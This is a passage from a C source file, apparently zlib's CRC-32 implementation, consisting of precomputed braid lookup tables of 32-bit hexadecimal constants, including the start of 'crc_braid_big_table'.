0xad3a486f, 0x0e6ccec6, 0xd98e4e9e, 0x8953e35a, 0x5eb16302, 0xfde7e5ab, 0x2a0565f3, 0x603beeb8, 0xb7d96ee0, 0x148fe849, 0xc36d6811, 0x80f2fedf, 0x57107e87, 0xf446f82e, 0x23a47876, 0x699af33d, 0xbe787365, 0x1d2ef5cc, 0xcacc7594, 0xbc95ae44, 0x6b772e1c, 0xc821a8b5, 0x1fc328ed, 0x55fda3a6, 0x821f23fe, 0x2149a557, 0xf6ab250f, 0xb534b3c1, 0x62d63399, 0xc180b530, 0x16623568, 0x5c5cbe23, 0x8bbe3e7b, 0x28e8b8d2, 0xff0a388a, 0xafd7954e, 0x78351516, 0xdb6393bf, 0x0c8113e7, 0x46bf98ac, 0x915d18f4, 0x320b9e5d, 0xe5e91e05, 0xa67688cb, 0x71940893, 0xd2c28e3a, 0x05200e62, 0x4f1e8529, 
0x98fc0571, 0x3baa83d8, 0xec480380, 0xd7193478, 0x00fbb420, 0xa3ad3289, 0x744fb2d1, 0x3e71399a, 0xe993b9c2, 0x4ac53f6b, 0x9d27bf33, 0xdeb829fd, 0x095aa9a5, 0xaa0c2f0c, 0x7deeaf54, 0x37d0241f, 0xe032a447, 0x436422ee, 0x9486a2b6, 0xc45b0f72, 0x13b98f2a, 0xb0ef0983, 0x670d89db, 0x2d330290, 0xfad182c8, 0x59870461, 0x8e658439, 0xcdfa12f7, 0x1a1892af, 0xb94e1406, 0x6eac945e, 0x24921f15, 0xf3709f4d, 0x502619e4, 0x87c499bc, 0xf19d426c, 0x267fc234, 0x8529449d, 0x52cbc4c5, 0x18f54f8e, 0xcf17cfd6, 0x6c41497f, 0xbba3c927, 0xf83c5fe9, 0x2fdedfb1, 0x8c885918, 0x5b6ad940, 0x1154520b, 0xc6b6d253, 0x65e054fa, 0xb202d4a2, 0xe2df7966, 0x353df93e, 0x966b7f97, 0x4189ffcf, 0x0bb77484, 0xdc55f4dc, 0x7f037275, 0xa8e1f22d, 0xeb7e64e3, 0x3c9ce4bb, 0x9fca6212, 0x4828e24a, 0x02166901, 0xd5f4e959, 0x76a26ff0, 0xa140efa8}, {0x00000000, 0xef52b6e1, 0x05d46b83, 0xea86dd62, 0x0ba8d706, 0xe4fa61e7, 0x0e7cbc85, 0xe12e0a64, 0x1751ae0c, 0xf80318ed, 0x1285c58f, 0xfdd7736e, 0x1cf9790a, 0xf3abcfeb, 0x192d1289, 0xf67fa468, 0x2ea35c18, 0xc1f1eaf9, 0x2b77379b, 0xc425817a, 0x250b8b1e, 0xca593dff, 0x20dfe09d, 0xcf8d567c, 0x39f2f214, 0xd6a044f5, 0x3c269997, 0xd3742f76, 0x325a2512, 0xdd0893f3, 0x378e4e91, 0xd8dcf870, 0x5d46b830, 0xb2140ed1, 0x5892d3b3, 0xb7c06552, 0x56ee6f36, 0xb9bcd9d7, 0x533a04b5, 0xbc68b254, 0x4a17163c, 0xa545a0dd, 0x4fc37dbf, 0xa091cb5e, 0x41bfc13a, 0xaeed77db, 0x446baab9, 0xab391c58, 0x73e5e428, 0x9cb752c9, 0x76318fab, 0x9963394a, 0x784d332e, 0x971f85cf, 0x7d9958ad, 0x92cbee4c, 0x64b44a24, 0x8be6fcc5, 0x616021a7, 0x8e329746, 0x6f1c9d22, 0x804e2bc3, 0x6ac8f6a1, 0x859a4040, 0xba8d7060, 0x55dfc681, 0xbf591be3, 0x500bad02, 0xb125a766, 0x5e771187, 0xb4f1cce5, 0x5ba37a04, 0xaddcde6c, 0x428e688d, 0xa808b5ef, 0x475a030e, 0xa674096a, 0x4926bf8b, 0xa3a062e9, 0x4cf2d408, 0x942e2c78, 0x7b7c9a99, 0x91fa47fb, 0x7ea8f11a, 0x9f86fb7e, 0x70d44d9f, 0x9a5290fd, 0x7500261c, 0x837f8274, 0x6c2d3495, 0x86abe9f7, 0x69f95f16, 0x88d75572, 0x6785e393, 0x8d033ef1, 0x62518810, 0xe7cbc850, 0x08997eb1, 0xe21fa3d3, 
0x0d4d1532, 0xec631f56, 0x0331a9b7, 0xe9b774d5, 0x06e5c234, 0xf09a665c, 0x1fc8d0bd, 0xf54e0ddf, 0x1a1cbb3e, 0xfb32b15a, 0x146007bb, 0xfee6dad9, 0x11b46c38, 0xc9689448, 0x263a22a9, 0xccbcffcb, 0x23ee492a, 0xc2c0434e, 0x2d92f5af, 0xc71428cd, 0x28469e2c, 0xde393a44, 0x316b8ca5, 0xdbed51c7, 0x34bfe726, 0xd591ed42, 0x3ac35ba3, 0xd04586c1, 0x3f173020, 0xae6be681, 0x41395060, 0xabbf8d02, 0x44ed3be3, 0xa5c33187, 0x4a918766, 0xa0175a04, 0x4f45ece5, 0xb93a488d, 0x5668fe6c, 0xbcee230e, 0x53bc95ef, 0xb2929f8b, 0x5dc0296a, 0xb746f408, 0x581442e9, 0x80c8ba99, 0x6f9a0c78, 0x851cd11a, 0x6a4e67fb, 0x8b606d9f, 0x6432db7e, 0x8eb4061c, 0x61e6b0fd, 0x97991495, 0x78cba274, 0x924d7f16, 0x7d1fc9f7, 0x9c31c393, 0x73637572, 0x99e5a810, 0x76b71ef1, 0xf32d5eb1, 0x1c7fe850, 0xf6f93532, 0x19ab83d3, 0xf88589b7, 0x17d73f56, 0xfd51e234, 0x120354d5, 0xe47cf0bd, 0x0b2e465c, 0xe1a89b3e, 0x0efa2ddf, 0xefd427bb, 0x0086915a, 0xea004c38, 0x0552fad9, 0xdd8e02a9, 0x32dcb448, 0xd85a692a, 0x3708dfcb, 0xd626d5af, 0x3974634e, 0xd3f2be2c, 0x3ca008cd, 0xcadfaca5, 0x258d1a44, 0xcf0bc726, 0x205971c7, 0xc1777ba3, 0x2e25cd42, 0xc4a31020, 0x2bf1a6c1, 0x14e696e1, 0xfbb42000, 0x1132fd62, 0xfe604b83, 0x1f4e41e7, 0xf01cf706, 0x1a9a2a64, 0xf5c89c85, 0x03b738ed, 0xece58e0c, 0x0663536e, 0xe931e58f, 0x081fefeb, 0xe74d590a, 0x0dcb8468, 0xe2993289, 0x3a45caf9, 0xd5177c18, 0x3f91a17a, 0xd0c3179b, 0x31ed1dff, 0xdebfab1e, 0x3439767c, 0xdb6bc09d, 0x2d1464f5, 0xc246d214, 0x28c00f76, 0xc792b997, 0x26bcb3f3, 0xc9ee0512, 0x2368d870, 0xcc3a6e91, 0x49a02ed1, 0xa6f29830, 0x4c744552, 0xa326f3b3, 0x4208f9d7, 0xad5a4f36, 0x47dc9254, 0xa88e24b5, 0x5ef180dd, 0xb1a3363c, 0x5b25eb5e, 0xb4775dbf, 0x555957db, 0xba0be13a, 0x508d3c58, 0xbfdf8ab9, 0x670372c9, 0x8851c428, 0x62d7194a, 0x8d85afab, 0x6caba5cf, 0x83f9132e, 0x697fce4c, 0x862d78ad, 0x7052dcc5, 0x9f006a24, 0x7586b746, 0x9ad401a7, 0x7bfa0bc3, 0x94a8bd22, 0x7e2e6040, 0x917cd6a1}, {0x00000000, 0x87a6cb43, 0xd43c90c7, 0x539a5b84, 0x730827cf, 0xf4aeec8c, 0xa734b708, 0x20927c4b, 0xe6104f9e, 
0x61b684dd, 0x322cdf59, 0xb58a141a, 0x95186851, 0x12bea312, 0x4124f896, 0xc68233d5, 0x1751997d, 0x90f7523e, 0xc36d09ba, 0x44cbc2f9, 0x6459beb2, 0xe3ff75f1, 0xb0652e75, 0x37c3e536, 0xf141d6e3, 0x76e71da0, 0x257d4624, 0xa2db8d67, 0x8249f12c, 0x05ef3a6f, 0x567561eb, 0xd1d3aaa8, 0x2ea332fa, 0xa905f9b9, 0xfa9fa23d, 0x7d39697e, 0x5dab1535, 0xda0dde76, 0x899785f2, 0x0e314eb1, 0xc8b37d64, 0x4f15b627, 0x1c8feda3, 0x9b2926e0, 0xbbbb5aab, 0x3c1d91e8, 0x6f87ca6c, 0xe821012f, 0x39f2ab87, 0xbe5460c4, 0xedce3b40, 0x6a68f003, 0x4afa8c48, 0xcd5c470b, 0x9ec61c8f, 0x1960d7cc, 0xdfe2e419, 0x58442f5a, 0x0bde74de, 0x8c78bf9d, 0xaceac3d6, 0x2b4c0895, 0x78d65311, 0xff709852, 0x5d4665f4, 0xdae0aeb7, 0x897af533, 0x0edc3e70, 0x2e4e423b, 0xa9e88978, 0xfa72d2fc, 0x7dd419bf, 0xbb562a6a, 0x3cf0e129, 0x6f6abaad, 0xe8cc71ee, 0xc85e0da5, 0x4ff8c6e6, 0x1c629d62, 0x9bc45621, 0x4a17fc89, 0xcdb137ca, 0x9e2b6c4e, 0x198da70d, 0x391fdb46, 0xbeb91005, 0xed234b81, 0x6a8580c2, 0xac07b317, 0x2ba17854, 0x783b23d0, 0xff9de893, 0xdf0f94d8, 0x58a95f9b, 0x0b33041f, 0x8c95cf5c, 0x73e5570e, 0xf4439c4d, 0xa7d9c7c9, 0x207f0c8a, 0x00ed70c1, 0x874bbb82, 0xd4d1e006, 0x53772b45, 0x95f51890, 0x1253d3d3, 0x41c98857, 0xc66f4314, 0xe6fd3f5f, 0x615bf41c, 0x32c1af98, 0xb56764db, 0x64b4ce73, 0xe3120530, 0xb0885eb4, 0x372e95f7, 0x17bce9bc, 0x901a22ff, 0xc380797b, 0x4426b238, 0x82a481ed, 0x05024aae, 0x5698112a, 0xd13eda69, 0xf1aca622, 0x760a6d61, 0x259036e5, 0xa236fda6, 0xba8ccbe8, 0x3d2a00ab, 0x6eb05b2f, 0xe916906c, 0xc984ec27, 0x4e222764, 0x1db87ce0, 0x9a1eb7a3, 0x5c9c8476, 0xdb3a4f35, 0x88a014b1, 0x0f06dff2, 0x2f94a3b9, 0xa83268fa, 0xfba8337e, 0x7c0ef83d, 0xaddd5295, 0x2a7b99d6, 0x79e1c252, 0xfe470911, 0xded5755a, 0x5973be19, 0x0ae9e59d, 0x8d4f2ede, 0x4bcd1d0b, 0xcc6bd648, 0x9ff18dcc, 0x1857468f, 0x38c53ac4, 0xbf63f187, 0xecf9aa03, 0x6b5f6140, 0x942ff912, 0x13893251, 0x401369d5, 0xc7b5a296, 0xe727dedd, 0x6081159e, 0x331b4e1a, 0xb4bd8559, 0x723fb68c, 0xf5997dcf, 0xa603264b, 0x21a5ed08, 0x01379143, 0x86915a00, 0xd50b0184, 
0x52adcac7, 0x837e606f, 0x04d8ab2c, 0x5742f0a8, 0xd0e43beb, 0xf07647a0, 0x77d08ce3, 0x244ad767, 0xa3ec1c24, 0x656e2ff1, 0xe2c8e4b2, 0xb152bf36, 0x36f47475, 0x1666083e, 0x91c0c37d, 0xc25a98f9, 0x45fc53ba, 0xe7caae1c, 0x606c655f, 0x33f63edb, 0xb450f598, 0x94c289d3, 0x13644290, 0x40fe1914, 0xc758d257, 0x01dae182, 0x867c2ac1, 0xd5e67145, 0x5240ba06, 0x72d2c64d, 0xf5740d0e, 0xa6ee568a, 0x21489dc9, 0xf09b3761, 0x773dfc22, 0x24a7a7a6, 0xa3016ce5, 0x839310ae, 0x0435dbed, 0x57af8069, 0xd0094b2a, 0x168b78ff, 0x912db3bc, 0xc2b7e838, 0x4511237b, 0x65835f30, 0xe2259473, 0xb1bfcff7, 0x361904b4, 0xc9699ce6, 0x4ecf57a5, 0x1d550c21, 0x9af3c762, 0xba61bb29, 0x3dc7706a, 0x6e5d2bee, 0xe9fbe0ad, 0x2f79d378, 0xa8df183b, 0xfb4543bf, 0x7ce388fc, 0x5c71f4b7, 0xdbd73ff4, 0x884d6470, 0x0febaf33, 0xde38059b, 0x599eced8, 0x0a04955c, 0x8da25e1f, 0xad302254, 0x2a96e917, 0x790cb293, 0xfeaa79d0, 0x38284a05, 0xbf8e8146, 0xec14dac2, 0x6bb21181, 0x4b206dca, 0xcc86a689, 0x9f1cfd0d, 0x18ba364e}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x43cba687, 0xc7903cd4, 0x845b9a53, 0xcf270873, 0x8cecaef4, 0x08b734a7, 0x4b7c9220, 0x9e4f10e6, 0xdd84b661, 0x59df2c32, 0x1a148ab5, 0x51681895, 0x12a3be12, 0x96f82441, 0xd53382c6, 0x7d995117, 0x3e52f790, 0xba096dc3, 0xf9c2cb44, 0xb2be5964, 0xf175ffe3, 0x752e65b0, 0x36e5c337, 0xe3d641f1, 0xa01de776, 0x24467d25, 0x678ddba2, 0x2cf14982, 0x6f3aef05, 0xeb617556, 0xa8aad3d1, 0xfa32a32e, 0xb9f905a9, 0x3da29ffa, 0x7e69397d, 0x3515ab5d, 0x76de0dda, 0xf2859789, 0xb14e310e, 0x647db3c8, 0x27b6154f, 0xa3ed8f1c, 0xe026299b, 0xab5abbbb, 0xe8911d3c, 0x6cca876f, 0x2f0121e8, 0x87abf239, 0xc46054be, 0x403bceed, 0x03f0686a, 0x488cfa4a, 0x0b475ccd, 0x8f1cc69e, 0xccd76019, 0x19e4e2df, 0x5a2f4458, 0xde74de0b, 0x9dbf788c, 0xd6c3eaac, 0x95084c2b, 0x1153d678, 0x529870ff, 0xf465465d, 0xb7aee0da, 0x33f57a89, 0x703edc0e, 0x3b424e2e, 0x7889e8a9, 0xfcd272fa, 0xbf19d47d, 0x6a2a56bb, 0x29e1f03c, 0xadba6a6f, 0xee71cce8, 0xa50d5ec8, 0xe6c6f84f, 0x629d621c, 0x2156c49b, 
0x89fc174a, 0xca37b1cd, 0x4e6c2b9e, 0x0da78d19, 0x46db1f39, 0x0510b9be, 0x814b23ed, 0xc280856a, 0x17b307ac, 0x5478a12b, 0xd0233b78, 0x93e89dff, 0xd8940fdf, 0x9b5fa958, 0x1f04330b, 0x5ccf958c, 0x0e57e573, 0x4d9c43f4, 0xc9c7d9a7, 0x8a0c7f20, 0xc170ed00, 0x82bb4b87, 0x06e0d1d4, 0x452b7753, 0x9018f595, 0xd3d35312, 0x5788c941, 0x14436fc6, 0x5f3ffde6, 0x1cf45b61, 0x98afc132, 0xdb6467b5, 0x73ceb464, 0x300512e3, 0xb45e88b0, 0xf7952e37, 0xbce9bc17, 0xff221a90, 0x7b7980c3, 0x38b22644, 0xed81a482, 0xae4a0205, 0x2a119856, 0x69da3ed1, 0x22a6acf1, 0x616d0a76, 0xe5369025, 0xa6fd36a2, 0xe8cb8cba, 0xab002a3d, 0x2f5bb06e, 0x6c9016e9, 0x27ec84c9, 0x6427224e, 0xe07cb81d, 0xa3b71e9a, 0x76849c5c, 0x354f3adb, 0xb114a088, 0xf2df060f, 0xb9a3942f, 0xfa6832a8, 0x7e33a8fb, 0x3df80e7c, 0x9552ddad, 0xd6997b2a, 0x52c2e179, 0x110947fe, 0x5a75d5de, 0x19be7359, 0x9de5e90a, 0xde2e4f8d, 0x0b1dcd4b, 0x48d66bcc, 0xcc8df19f, 0x8f465718, 0xc43ac538, 0x87f163bf, 0x03aaf9ec, 0x40615f6b, 0x12f92f94, 0x51328913, 0xd5691340, 0x96a2b5c7, 0xddde27e7, 0x9e158160, 0x1a4e1b33, 0x5985bdb4, 0x8cb63f72, 0xcf7d99f5, 0x4b2603a6, 0x08eda521, 0x43913701, 0x005a9186, 0x84010bd5, 0xc7caad52, 0x6f607e83, 0x2cabd804, 0xa8f04257, 0xeb3be4d0, 0xa04776f0, 0xe38cd077, 0x67d74a24, 0x241ceca3, 0xf12f6e65, 0xb2e4c8e2, 0x36bf52b1, 0x7574f436, 0x3e086616, 0x7dc3c091, 0xf9985ac2, 0xba53fc45, 0x1caecae7, 0x5f656c60, 0xdb3ef633, 0x98f550b4, 0xd389c294, 0x90426413, 0x1419fe40, 0x57d258c7, 0x82e1da01, 0xc12a7c86, 0x4571e6d5, 0x06ba4052, 0x4dc6d272, 0x0e0d74f5, 0x8a56eea6, 0xc99d4821, 0x61379bf0, 0x22fc3d77, 0xa6a7a724, 0xe56c01a3, 0xae109383, 0xeddb3504, 0x6980af57, 0x2a4b09d0, 0xff788b16, 0xbcb32d91, 0x38e8b7c2, 0x7b231145, 0x305f8365, 0x739425e2, 0xf7cfbfb1, 0xb4041936, 0xe69c69c9, 0xa557cf4e, 0x210c551d, 0x62c7f39a, 0x29bb61ba, 0x6a70c73d, 0xee2b5d6e, 0xade0fbe9, 0x78d3792f, 0x3b18dfa8, 0xbf4345fb, 0xfc88e37c, 0xb7f4715c, 0xf43fd7db, 0x70644d88, 0x33afeb0f, 0x9b0538de, 0xd8ce9e59, 0x5c95040a, 0x1f5ea28d, 0x542230ad, 0x17e9962a, 
0x93b20c79, 0xd079aafe, 0x054a2838, 0x46818ebf, 0xc2da14ec, 0x8111b26b, 0xca6d204b, 0x89a686cc, 0x0dfd1c9f, 0x4e36ba18}, {0x00000000, 0xe1b652ef, 0x836bd405, 0x62dd86ea, 0x06d7a80b, 0xe761fae4, 0x85bc7c0e, 0x640a2ee1, 0x0cae5117, 0xed1803f8, 0x8fc58512, 0x6e73d7fd, 0x0a79f91c, 0xebcfabf3, 0x89122d19, 0x68a47ff6, 0x185ca32e, 0xf9eaf1c1, 0x9b37772b, 0x7a8125c4, 0x1e8b0b25, 0xff3d59ca, 0x9de0df20, 0x7c568dcf, 0x14f2f239, 0xf544a0d6, 0x9799263c, 0x762f74d3, 0x12255a32, 0xf39308dd, 0x914e8e37, 0x70f8dcd8, 0x30b8465d, 0xd10e14b2, 0xb3d39258, 0x5265c0b7, 0x366fee56, 0xd7d9bcb9, 0xb5043a53, 0x54b268bc, 0x3c16174a, 0xdda045a5, 0xbf7dc34f, 0x5ecb91a0, 0x3ac1bf41, 0xdb77edae, 0xb9aa6b44, 0x581c39ab, 0x28e4e573, 0xc952b79c, 0xab8f3176, 0x4a396399, 0x2e334d78, 0xcf851f97, 0xad58997d, 0x4ceecb92, 0x244ab464, 0xc5fce68b, 0xa7216061, 0x4697328e, 0x229d1c6f, 0xc32b4e80, 0xa1f6c86a, 0x40409a85, 0x60708dba, 0x81c6df55, 0xe31b59bf, 0x02ad0b50, 0x66a725b1, 0x8711775e, 0xe5ccf1b4, 0x047aa35b, 0x6cdedcad, 0x8d688e42, 0xefb508a8, 0x0e035a47, 0x6a0974a6, 0x8bbf2649, 0xe962a0a3, 0x08d4f24c, 0x782c2e94, 0x999a7c7b, 0xfb47fa91, 0x1af1a87e, 0x7efb869f, 0x9f4dd470, 0xfd90529a, 0x1c260075, 0x74827f83, 0x95342d6c, 0xf7e9ab86, 0x165ff969, 0x7255d788, 0x93e38567, 0xf13e038d, 0x10885162, 0x50c8cbe7, 0xb17e9908, 0xd3a31fe2, 0x32154d0d, 0x561f63ec, 0xb7a93103, 0xd574b7e9, 0x34c2e506, 0x5c669af0, 0xbdd0c81f, 0xdf0d4ef5, 0x3ebb1c1a, 0x5ab132fb, 0xbb076014, 0xd9dae6fe, 0x386cb411, 0x489468c9, 0xa9223a26, 0xcbffbccc, 0x2a49ee23, 0x4e43c0c2, 0xaff5922d, 0xcd2814c7, 0x2c9e4628, 0x443a39de, 0xa58c6b31, 0xc751eddb, 0x26e7bf34, 0x42ed91d5, 0xa35bc33a, 0xc18645d0, 0x2030173f, 0x81e66bae, 0x60503941, 0x028dbfab, 0xe33bed44, 0x8731c3a5, 0x6687914a, 0x045a17a0, 0xe5ec454f, 0x8d483ab9, 0x6cfe6856, 0x0e23eebc, 0xef95bc53, 0x8b9f92b2, 0x6a29c05d, 0x08f446b7, 0xe9421458, 0x99bac880, 0x780c9a6f, 0x1ad11c85, 0xfb674e6a, 0x9f6d608b, 0x7edb3264, 0x1c06b48e, 0xfdb0e661, 0x95149997, 0x74a2cb78, 0x167f4d92, 0xf7c91f7d, 
0x93c3319c, 0x72756373, 0x10a8e599, 0xf11eb776, 0xb15e2df3, 0x50e87f1c, 0x3235f9f6, 0xd383ab19, 0xb78985f8, 0x563fd717, 0x34e251fd, 0xd5540312, 0xbdf07ce4, 0x5c462e0b, 0x3e9ba8e1, 0xdf2dfa0e, 0xbb27d4ef, 0x5a918600, 0x384c00ea, 0xd9fa5205, 0xa9028edd, 0x48b4dc32, 0x2a695ad8, 0xcbdf0837, 0xafd526d6, 0x4e637439, 0x2cbef2d3, 0xcd08a03c, 0xa5acdfca, 0x441a8d25, 0x26c70bcf, 0xc7715920, 0xa37b77c1, 0x42cd252e, 0x2010a3c4, 0xc1a6f12b, 0xe196e614, 0x0020b4fb, 0x62fd3211, 0x834b60fe, 0xe7414e1f, 0x06f71cf0, 0x642a9a1a, 0x859cc8f5, 0xed38b703, 0x0c8ee5ec, 0x6e536306, 0x8fe531e9, 0xebef1f08, 0x0a594de7, 0x6884cb0d, 0x893299e2, 0xf9ca453a, 0x187c17d5, 0x7aa1913f, 0x9b17c3d0, 0xff1ded31, 0x1eabbfde, 0x7c763934, 0x9dc06bdb, 0xf564142d, 0x14d246c2, 0x760fc028, 0x97b992c7, 0xf3b3bc26, 0x1205eec9, 0x70d86823, 0x916e3acc, 0xd12ea049, 0x3098f2a6, 0x5245744c, 0xb3f326a3, 0xd7f90842, 0x364f5aad, 0x5492dc47, 0xb5248ea8, 0xdd80f15e, 0x3c36a3b1, 0x5eeb255b, 0xbf5d77b4, 0xdb575955, 0x3ae10bba, 0x583c8d50, 0xb98adfbf, 0xc9720367, 0x28c45188, 0x4a19d762, 0xabaf858d, 0xcfa5ab6c, 0x2e13f983, 0x4cce7f69, 0xad782d86, 0xc5dc5270, 0x246a009f, 0x46b78675, 0xa701d49a, 0xc30bfa7b, 0x22bda894, 0x40602e7e, 0xa1d67c91}, {0x00000000, 0x5880e2d7, 0xf106b474, 0xa98656a3, 0xe20d68e9, 0xba8d8a3e, 0x130bdc9d, 0x4b8b3e4a, 0x851da109, 0xdd9d43de, 0x741b157d, 0x2c9bf7aa, 0x6710c9e0, 0x3f902b37, 0x96167d94, 0xce969f43, 0x0a3b4213, 0x52bba0c4, 0xfb3df667, 0xa3bd14b0, 0xe8362afa, 0xb0b6c82d, 0x19309e8e, 0x41b07c59, 0x8f26e31a, 0xd7a601cd, 0x7e20576e, 0x26a0b5b9, 0x6d2b8bf3, 0x35ab6924, 0x9c2d3f87, 0xc4addd50, 0x14768426, 0x4cf666f1, 0xe5703052, 0xbdf0d285, 0xf67beccf, 0xaefb0e18, 0x077d58bb, 0x5ffdba6c, 0x916b252f, 0xc9ebc7f8, 0x606d915b, 0x38ed738c, 0x73664dc6, 0x2be6af11, 0x8260f9b2, 0xdae01b65, 0x1e4dc635, 0x46cd24e2, 0xef4b7241, 0xb7cb9096, 0xfc40aedc, 0xa4c04c0b, 0x0d461aa8, 0x55c6f87f, 0x9b50673c, 0xc3d085eb, 0x6a56d348, 0x32d6319f, 0x795d0fd5, 0x21dded02, 0x885bbba1, 0xd0db5976, 0x28ec084d, 0x706cea9a, 
0xd9eabc39, 0x816a5eee, 0xcae160a4, 0x92618273, 0x3be7d4d0, 0x63673607, 0xadf1a944, 0xf5714b93, 0x5cf71d30, 0x0477ffe7, 0x4ffcc1ad, 0x177c237a, 0xbefa75d9, 0xe67a970e, 0x22d74a5e, 0x7a57a889, 0xd3d1fe2a, 0x8b511cfd, 0xc0da22b7, 0x985ac060, 0x31dc96c3, 0x695c7414, 0xa7caeb57, 0xff4a0980, 0x56cc5f23, 0x0e4cbdf4, 0x45c783be, 0x1d476169, 0xb4c137ca, 0xec41d51d, 0x3c9a8c6b, 0x641a6ebc, 0xcd9c381f, 0x951cdac8, 0xde97e482, 0x86170655, 0x2f9150f6, 0x7711b221, 0xb9872d62, 0xe107cfb5, 0x48819916, 0x10017bc1, 0x5b8a458b, 0x030aa75c, 0xaa8cf1ff, 0xf20c1328, 0x36a1ce78, 0x6e212caf, 0xc7a77a0c, 0x9f2798db, 0xd4aca691, 0x8c2c4446, 0x25aa12e5, 0x7d2af032, 0xb3bc6f71, 0xeb3c8da6, 0x42badb05, 0x1a3a39d2, 0x51b10798, 0x0931e54f, 0xa0b7b3ec, 0xf837513b, 0x50d8119a, 0x0858f34d, 0xa1dea5ee, 0xf95e4739, 0xb2d57973, 0xea559ba4, 0x43d3cd07, 0x1b532fd0, 0xd5c5b093, 0x8d455244, 0x24c304e7, 0x7c43e630, 0x37c8d87a, 0x6f483aad, 0xc6ce6c0e, 0x9e4e8ed9, 0x5ae35389, 0x0263b15e, 0xabe5e7fd, 0xf365052a, 0xb8ee3b60, 0xe06ed9b7, 0x49e88f14, 0x11686dc3, 0xdffef280, 0x877e1057, 0x2ef846f4, 0x7678a423, 0x3df39a69, 0x657378be, 0xccf52e1d, 0x9475ccca, 0x44ae95bc, 0x1c2e776b, 0xb5a821c8, 0xed28c31f, 0xa6a3fd55, 0xfe231f82, 0x57a54921, 0x0f25abf6, 0xc1b334b5, 0x9933d662, 0x30b580c1, 0x68356216, 0x23be5c5c, 0x7b3ebe8b, 0xd2b8e828, 0x8a380aff, 0x4e95d7af, 0x16153578, 0xbf9363db, 0xe713810c, 0xac98bf46, 0xf4185d91, 0x5d9e0b32, 0x051ee9e5, 0xcb8876a6, 0x93089471, 0x3a8ec2d2, 0x620e2005, 0x29851e4f, 0x7105fc98, 0xd883aa3b, 0x800348ec, 0x783419d7, 0x20b4fb00, 0x8932ada3, 0xd1b24f74, 0x9a39713e, 0xc2b993e9, 0x6b3fc54a, 0x33bf279d, 0xfd29b8de, 0xa5a95a09, 0x0c2f0caa, 0x54afee7d, 0x1f24d037, 0x47a432e0, 0xee226443, 0xb6a28694, 0x720f5bc4, 0x2a8fb913, 0x8309efb0, 0xdb890d67, 0x9002332d, 0xc882d1fa, 0x61048759, 0x3984658e, 0xf712facd, 0xaf92181a, 0x06144eb9, 0x5e94ac6e, 0x151f9224, 0x4d9f70f3, 0xe4192650, 0xbc99c487, 0x6c429df1, 0x34c27f26, 0x9d442985, 0xc5c4cb52, 0x8e4ff518, 0xd6cf17cf, 0x7f49416c, 0x27c9a3bb, 
0xe95f3cf8, 0xb1dfde2f, 0x1859888c, 0x40d96a5b, 0x0b525411, 0x53d2b6c6, 0xfa54e065, 0xa2d402b2, 0x6679dfe2, 0x3ef93d35, 0x977f6b96, 0xcfff8941, 0x8474b70b, 0xdcf455dc, 0x7572037f, 0x2df2e1a8, 0xe3647eeb, 0xbbe49c3c, 0x1262ca9f, 0x4ae22848, 0x01691602, 0x59e9f4d5, 0xf06fa276, 0xa8ef40a1}, {0x00000000, 0x463b6765, 0x8c76ceca, 0xca4da9af, 0x59ebed4e, 0x1fd08a2b, 0xd59d2384, 0x93a644e1, 0xb2d6db9d, 0xf4edbcf8, 0x3ea01557, 0x789b7232, 0xeb3d36d3, 0xad0651b6, 0x674bf819, 0x21709f7c, 0x25abc6e0, 0x6390a185, 0xa9dd082a, 0xefe66f4f, 0x7c402bae, 0x3a7b4ccb, 0xf036e564, 0xb60d8201, 0x977d1d7d, 0xd1467a18, 0x1b0bd3b7, 0x5d30b4d2, 0xce96f033, 0x88ad9756, 0x42e03ef9, 0x04db599c, 0x0b50fc1a, 0x4d6b9b7f, 0x872632d0, 0xc11d55b5, 0x52bb1154, 0x14807631, 0xdecddf9e, 0x98f6b8fb, 0xb9862787, 0xffbd40e2, 0x35f0e94d, 0x73cb8e28, 0xe06dcac9, 0xa656adac, 0x6c1b0403, 0x2a206366, 0x2efb3afa, 0x68c05d9f, 0xa28df430, 0xe4b69355, 0x7710d7b4, 0x312bb0d1, 0xfb66197e, 0xbd5d7e1b, 0x9c2de167, 0xda168602, 0x105b2fad, 0x566048c8, 0xc5c60c29, 0x83fd6b4c, 0x49b0c2e3, 0x0f8ba586, 0x16a0f835, 0x509b9f50, 0x9ad636ff, 0xdced519a, 0x4f4b157b, 0x0970721e, 0xc33ddbb1, 0x8506bcd4, 0xa47623a8, 0xe24d44cd, 0x2800ed62, 0x6e3b8a07, 0xfd9dcee6, 0xbba6a983, 0x71eb002c, 0x37d06749, 0x330b3ed5, 0x753059b0, 0xbf7df01f, 0xf946977a, 0x6ae0d39b, 0x2cdbb4fe, 0xe6961d51, 0xa0ad7a34, 0x81dde548, 0xc7e6822d, 0x0dab2b82, 0x4b904ce7, 0xd8360806, 0x9e0d6f63, 0x5440c6cc, 0x127ba1a9, 0x1df0042f, 0x5bcb634a, 0x9186cae5, 0xd7bdad80, 0x441be961, 0x02208e04, 0xc86d27ab, 0x8e5640ce, 0xaf26dfb2, 0xe91db8d7, 0x23501178, 0x656b761d, 0xf6cd32fc, 0xb0f65599, 0x7abbfc36, 0x3c809b53, 0x385bc2cf, 0x7e60a5aa, 0xb42d0c05, 0xf2166b60, 0x61b02f81, 0x278b48e4, 0xedc6e14b, 0xabfd862e, 0x8a8d1952, 0xccb67e37, 0x06fbd798, 0x40c0b0fd, 0xd366f41c, 0x955d9379, 0x5f103ad6, 0x192b5db3, 0x2c40f16b, 0x6a7b960e, 0xa0363fa1, 0xe60d58c4, 0x75ab1c25, 0x33907b40, 0xf9ddd2ef, 0xbfe6b58a, 0x9e962af6, 0xd8ad4d93, 0x12e0e43c, 0x54db8359, 0xc77dc7b8, 0x8146a0dd, 
0x4b0b0972, 0x0d306e17, 0x09eb378b, 0x4fd050ee, 0x859df941, 0xc3a69e24, 0x5000dac5, 0x163bbda0, 0xdc76140f, 0x9a4d736a, 0xbb3dec16, 0xfd068b73, 0x374b22dc, 0x717045b9, 0xe2d60158, 0xa4ed663d, 0x6ea0cf92, 0x289ba8f7, 0x27100d71, 0x612b6a14, 0xab66c3bb, 0xed5da4de, 0x7efbe03f, 0x38c0875a, 0xf28d2ef5, 0xb4b64990, 0x95c6d6ec, 0xd3fdb189, 0x19b01826, 0x5f8b7f43, 0xcc2d3ba2, 0x8a165cc7, 0x405bf568, 0x0660920d, 0x02bbcb91, 0x4480acf4, 0x8ecd055b, 0xc8f6623e, 0x5b5026df, 0x1d6b41ba, 0xd726e815, 0x911d8f70, 0xb06d100c, 0xf6567769, 0x3c1bdec6, 0x7a20b9a3, 0xe986fd42, 0xafbd9a27, 0x65f03388, 0x23cb54ed, 